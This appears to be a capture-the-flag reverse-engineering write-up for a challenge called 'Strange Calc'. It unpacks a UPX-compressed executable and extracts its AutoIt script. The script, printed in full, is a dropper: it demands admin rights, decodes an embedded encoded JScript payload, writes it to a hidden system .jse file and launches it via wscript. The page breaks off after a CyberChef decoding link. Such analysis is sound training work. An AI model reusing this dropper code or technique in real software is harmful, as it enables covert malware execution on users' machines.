<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Strange Calc</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #1e1e1e;
            color: #f0f0f0;
            margin: 0;
            padding: 20px;
        }
        .header {
            background-color: #333;
            padding: 10px;
            text-align: center;
        }
        .header a {
            color: #f0f0f0;
            text-decoration: none;
            margin: 0 15px;
        }
        .header a:hover {
            text-decoration: underline;
        }

        .container {
            max-width: 1200px;
            margin: 20px auto;
            padding: 20px;
            background-color: #2a2a2a;
            border-radius: 8px;
            box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
            color: #e0e0e0;
            font-family: 'Arial', sans-serif;
        }
      
        .code-box {
            background-color: #1a1a1a;
            padding: 15px;
            border-radius: 6px;
            border: 1px solid #333;
            margin: 15px 0;
        }

        .code-box pre {
            margin: 0;
            color: #cfcfcf;
            font-family: 'Courier New', Courier, monospace;
            font-size: 1em;
        }

        .image-box {
            text-align: center;
            margin: 20px 0;
        }

        .image-box img {
            max-width: 100%;
            height: auto;
            border-radius: 6px;
            box-shadow: 0 2px 8px rgba(0, 0, 0, 0.3);
        }

        p {
            line-height: 1.6;
            font-size: 1.1em;
            color: #d3d3d3; 
        }
        
        h1, h2 {
            color: #f0f0f0;
        }
        ul {
            list-style-type: none;
            padding: 0;
        }
        ul li {
            margin: 10px 0;
        }
        ul li a {
            text-decoration: none;
            color: #9cdbff;
            font-size: 1.2rem;
        }
        ul li a:hover {
            text-decoration: underline;
        }
        .command {
            background-color: #333; 
            color: #fff;          
            padding: 10px;        
            margin-bottom: 10px; 
        }

    </style>
</head>
<body>
    <div class="header">
        <h1>Lotus</h1>
        <a href="../Forensic/index.html">Forensics</a>
        <a href="../Android/index.html">Android</a>
        <a href="../Reverse/index.html">Reversing</a>
    </div>
    <div class="container">
        <h1>Strange Calc</h1>
        <p>Description: I got this new calculator app from my friend! But it’s really weird, for some reason it needs admin permissions to run??</p>

        <span class="command">Using file on calc.exe: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed, 3 sections</span>

        We can see that it is a Windows executable that was compressed using UPX. With that knowledge, we can just unpack using the following command.
        
        <div class="code-box">
            <pre><code>upx -d calc.exe -o unpackcalc.exe</code></pre>
        </div>

        Once unpcaked, I used ghidra but saw nothing at first glance. I used the string command on the executable on can see this weird html code. 

        <div class="code-box">
            <pre><code>&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;
        &lt;assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"&gt;
            &lt;assemblyIdentity
                type="win32"
                processorArchitecture="*"
                version="3.0.0.0"
                name="AutoIt3"
            /&gt;
            &lt;description&gt;AutoIt v3&lt;/description&gt;
            &lt;!-- Identify the application security requirements. --&gt;
            &lt;trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"&gt;
                &lt;security&gt;
                    &lt;requestedPrivileges&gt;
                        &lt;requestedExecutionLevel
                            level="asInvoker"
                            uiAccess="false"
                        /&gt;
                    &lt;/requestedPrivileges&gt;
                &lt;/security&gt;
            &lt;/trustInfo&gt;
            &lt;!-- Identify the application dependencies. --&gt;
            &lt;dependency&gt;
                &lt;dependentAssembly&gt;
                    &lt;assemblyIdentity
                        type="win32"
                        name="Microsoft.Windows.Common-Controls"
                        version="6.0.0.0"
                        language="*"
                        processorArchitecture="*"
                        publicKeyToken="6595b64144ccf1df"
                    /&gt;
                &lt;/dependentAssembly&gt;
            &lt;/dependency&gt;
        &lt;/assembly&gt;
            </code></pre>
        </div>

        I discovered that AutoIt3 is a scripting language that can automate GUI commands on windows. I found AutoIt-Ripper that can extract the AutoIt file from the PE. I used <span>autoit-ripper unpackcalc.exe</span> in order to retrieve the AutoIt script that look like this:

        <div class="code-box">
            <pre><code>; <AUT2EXE VERSION: 3.2.4.9>
                ; ----------------------------------------------------------------------------
                ; <AUT2EXE INCLUDE-START: C:\Users\johnh\Desktop\Desktop\otto_calculator.au3>
                ; ----------------------------------------------------------------------------
                #NoTrayIcon
                #Region
                #AutoIt3Wrapper_Change2CUI=y
                #EndRegion
                If Not IsAdmin() Then
                    MsgBox(16, "Error", "You must have administrator privileges.")
                    Exit
                EndIf
                Local $a = "I0B+XmNRTUFBQT09VyF4XkRrS3hQbWAoYgk3bC5QMSdFRUJOJyggL2FWa0RjRS0JSippV1cuYzdsLlB/eCFwK0AhW2NWK1VMRHRJKzNRKgktbUQsMCc5JH9EUk0rMlZtbW5jSjcta1F1Jy9fZiZMfkVCKmlyMGNXY2tVTn9hcjZgRTh/b2tVRSoneCdaay0wIGJ4OSs2fTB2RSsJTkUjeyd4VC11MHt4J3JKIzFHVVlieCErSVxDLixveGA2IG00bC4vS04rKU92IWJPMisqW38yaTZXRHZcbS5QNCdxaTRAIVcgXit4VE90cHRfeypiCWIwdnRRJkAqeDZScysJTFk0Izguf2wzSS1tRH5re2M2Ul40bE1aVzkrek9gNCNSJnkjJ38yfkx7YzBjbXRtLi9XOSt6WWN0UXEqT2YgKid2Mn5WeHYwUl40bUQvVzluelljNF95I08yICondjJ+cyd2MCBeNGxEO0dOf2JZdjRRJipPMiBiW39mcG1RJ1VPRGJ4TCA2RFdoLzRsLlpLW39gY2JAIUAhICMtYE5AKkAqVyNiaWIwYzQzIEAhNiBWf3hvRDRSRiptMydqWS5yCW8gME1HOjt0Qy47V05uY3ZgJVs4WCpAIUAhVyMtYDNAKkAqeWIjcGtXYDRfZkAhNlJWf1VvRHRPOGJeX3s/RERyeEwgNkRHOjs0bE1aR1t/YGBjVkwmYkAhQCF/KnVzKjgpRCtERU1VUDFSZEUoL08uYnhvdlR+VCM4N0MuUHMncjRub3JVLHYqYyxSLQlNMW81YiwJSklSZmAiMXdgXUJ2dWIsO15xUiZ7MlMuT2YwL3YoLFtAIShjJiJ6Un8hSX5xS00tVXwneG54OUVpN2wufgknbGNoKmktbE1+Sycscnh/WVAhL38uUGRXXmxeYltoYnhra09EbVlXTX5FXwlfclAmbFtbcn5FeH9PUF5XXkNeb0RHO2FQQ05zcglrZEREbVlXTS8sSlcxbHNiOTpyVWIvWU1DWUtEUEpDW05yfnJtQ1ZeIH82bkpZSVxtRH4ye3grQX56bU9rN25vcjhOKzFZYEV/VV5EYndPUlV0bnNeQiNwV1dNYFxtLn47eyFwO0AhVyBzf3hMWTRSRnA7UVEqCXcgXSF4Y1ddNVl+VEIwbVYvfyMpMlIiRVVgSyQrREJGfjZDVmsrI3A0UkFCQUE9PV4jfkA="
                Local $b = x($a)
                Local $c = r(4) & r(2) & r(3) & r(1) & ".jse"
                Func r($aa)
                    Local $zz = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
                    Local $s = ""
                    For $i = 1 To $aa
                        $s &= StringMid($zz, Random(1, StringLen($zz), 1), 1)
                    Next
                    Return $s
                EndFunc
                Local $d = FileOpen($c, 2)
                If $d = -1 Then
                    MsgBox(16, "Error", "Failed to open the calculator.")
                    Exit
                EndIf
                FileWrite($d, $b)
                FileClose($d)
                FileSetAttrib($c, "+H")
                FileSetAttrib($c, "+S")
                Func x($e)
                    Local $f = DllStructCreate("dword")
                    DllCall("crypt32.dll", "int", "CryptStringToBinaryA", _
                        "str", $e, _
                        "dword", StringLen($e), _
                        "dword", 1, _
                        "ptr", 0, _
                        "ptr", DllStructGetPtr($f), _
                        "ptr", 0, _
                        "ptr", 0)
                    Local $g = DllStructCreate("byte[" & DllStructGetData($f, 1) & "]")
                    DllCall("crypt32.dll", "int", "CryptStringToBinaryA", _
                        "str", $e, _
                        "dword", StringLen($e), _
                        "dword", 1, _
                        "ptr", DllStructGetPtr($g), _
                        "ptr", DllStructGetPtr($f), _
                        "ptr", 0, _
                        "ptr", 0)
                    Return BinaryToString(DllStructGetData($g, 1))
                EndFunc
                $o = ObjCreate("MSScriptControl.ScriptControl")
                $o.Language = "JScript"
                $p = "new ActiveXObject('WScript.Shell').Run('wscript.exe " & $c & "',1,false);"
                $o.ExecuteStatement($p)
                ; ----------------------------------------------------------------------------
                ; <AUT2EXE INCLUDE-END: C:\Users\johnh\Desktop\Desktop\otto_calculator.au3>
                ; ----------------------------------------------------------------------------
                
                </code></pre>
        </div>

        Their is a weird base64 encoded string, using cyber chef we can convert the Local $a variable using "From Base64" and "Microsoft Script Decoder" (https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)Microsoft_Script_Decoder()&input=STBCK1htTlJUVUZCUVQwOVZ5RjRYa1JyUzNoUWJXQW9ZZ2szYkM1UU1TZEZSVUpPSnlnZ0wyRldhMFJqUlMwSlNpcHBWMWN1WXpkc0xsQi9lQ0Z3SzBBaFcyTldLMVZNUkhSSkt6TlJLZ2t0YlVRc01DYzVKSDlFVWswck1sWnRiVzVqU2pjdGExRjFKeTlmWmlaTWZrVkNLbWx5TUdOWFkydFZUbjloY2paZ1JUaC9iMnRWUlNvbmVDZGFheTB3SUdKNE9TczJmVEIyUlNzSlRrVWpleWQ0VkMxMU1IdDRKM0pLSXpGSFZWbGllQ0VyU1Z4RExpeHZlR0EySUcwMGJDNHZTMDRyS1U5MklXSlBNaXNxVzM4eWFUWlhSSFpjYlM1UU5DZHhhVFJBSVZjZ1hpdDRWRTkwY0hSZmV5cGlDV0l3ZG5SUkprQXFlRFpTY3lzSlRGazBJemd1ZjJ3elNTMXRSSDVyZTJNMlVsNDBiRTFhVnprcmVrOWdOQ05TSm5rakozOHlma3g3WXpCamJYUnRMaTlYT1N0NldXTjBVWEVxVDJZZ0tpZDJNbjVXZUhZd1VsNDBiVVF2VnpsdWVsbGpORjk1STA4eUlDb25kakorY3lkMk1DQmVOR3hFTzBkT2YySlpkalJSSmlwUE1pQmlXMzltY0cxUkoxVlBSR0o0VENBMlJGZG9MelJzTGxwTFczOWdZMkpBSVVBaElDTXRZRTVBS2tBcVZ5TmlhV0l3WXpReklFQWhOaUJXZjNodlJEUlNSaXB0TXlkcVdTNXlDVzhnTUUxSE9qdDBReTQ3VjA1dVkzWmdKVnM0V0NwQUlVQWhWeU10WUROQUtrQXFlV0lqY0d0WFlEUmZaa0FoTmxKV2YxVnZSSFJQT0dKZVgzcy9SRVJ5ZUV3Z05rUkhPanMwYkUxYVIxdC9ZR0JqVmt3bVlrQWhRQ0YvS25WektqZ3BSQ3RFUlUxVlVERlNaRVVvTDA4dVluaHZkbFIrVkNNNE4wTXVVSE1uY2pSdWIzSlZMSFlxWXl4U0xRbE5NVzgxWWl3SlNrbFNabUFpTVhkZ1hVSjJkV0lzTzE1eFVpWjdNbE11VDJZd0wzWW9MRnRBSVNoakppSjZVbjhoU1g1eFMwMHRWWHduZUc1NE9VVnBOMnd1ZmdrbmJHTm9LbWt0YkUxK1N5Y3NjbmgvV1ZBaEwzOHVVR1JYWG14ZVlsdG9ZbmhyYTA5RWJWbFhUWDVGWHdsZmNsQW1iRnRiY241RmVIOVBVRjVYWGtOZWIwUkhPMkZRUTA1emNnbHJaRVJFYlZsWFRTOHNTbGN4YkhOaU9UcHlWV0l2V1UxRFdVdEVVRXBEVzA1eWZuSnRRMVplSUg4MmJrcFpTVnh0Ukg0eWUzZ3JRWDU2YlU5ck4yNXZjamhPS3pGWllFVi9WVjVFWW5kUFVsVjBibk5lUWlOd1YxZE5ZRnh0TG40N2V5RndPMEFoVnlCemYzaE1XVFJTUm5BN1VWRXFDWGNnWFNGNFkxZGROVmwrVkVJd2JWWXZmeU1wTWxJaVJWVmdTeVFyUkVKR2ZqWkRWbXNySTNBMFVrRkNRVUU5UFY0amZrQT0&oeol=NEL)
        

    </div>
</body>
</html>
